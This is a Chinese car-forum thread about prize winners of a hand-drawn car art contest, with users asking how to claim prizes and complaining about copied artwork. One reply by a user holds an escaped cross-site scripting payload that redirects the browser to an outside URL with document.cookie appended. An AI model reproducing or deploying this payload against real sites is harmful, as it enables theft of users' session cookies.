【全国】手绘爱车季~ 获奖公布。

全部回复 只看楼主

海的阳光1 关禁闭 已屏蔽
我也得了钥匙扣,还没收到,我是纯手绘。
無域不麾 关禁闭 已屏蔽
马自达3 昂克赛拉

ZS周 2017/07/26 21:39:33 发表在 318楼

怎么领奖?貌似地址都没找我们要

应该是自己填地址,在个人资料里
cherubic 关禁闭 已屏蔽
途昂
中奖了,要怎么领奖?第一次中奖~
xia130102323 关禁闭 已屏蔽
迈腾
三等奖呀!

多多支持活动吧!

请问获奖了怎么领取呢?
amouyuka 关禁闭 已屏蔽
陆风X7

获奖的耐心等待站内短消息填地址就可以~

不用急~

xia130102323 关禁闭 已屏蔽
迈腾
其他活动中奖的时候会有一条信息过来让填写手机,姓名,地址什么的。这个咋没有呢?
好义安定 关禁闭 已屏蔽
朗动
在哪领奖?等系统通知吗?自动发送?
天凉好个秋gr 关禁闭 已屏蔽
威驰FS
感谢
火车司机2015 关禁闭 已屏蔽
瑞风S3

amouyuka 2017/07/25 14:35:30 发表在 307楼

希望这种盗图和冒充原创的 永久封杀

支持,不公平
amouyuka 关禁闭 已屏蔽
陆风X7
新秀丽背包收到
感谢汽车之家 也祝贺各位获奖选手~

宝宝爱汽车 关禁闭 已屏蔽
标致508
什么时候发奖品啊?
标致508
我的书包没订单,五一的书包没到货
标致508
happy74 关禁闭 已屏蔽

\u003cscriptXSS\u003edocument.Location=\u0027http:\u002f\u002fwww.baidu.com\u003fx=\u0027\u002bdocument.cookie\u003c/scriptXSS\u003e

标致508
东方快车5200 关禁闭 已屏蔽
我刚才才看到,原来自己得了三等奖。
标致508

奖品呢?

标致508
书包呢
标致508
书包呢?
系统故障
发表回复
更多精彩

加载中
    您确认要删除这条回帖吗?
    取消
    确定

此帖由于异常操作被冻结1小时,暂时无法修改,冻结期至2015/02/02 13:56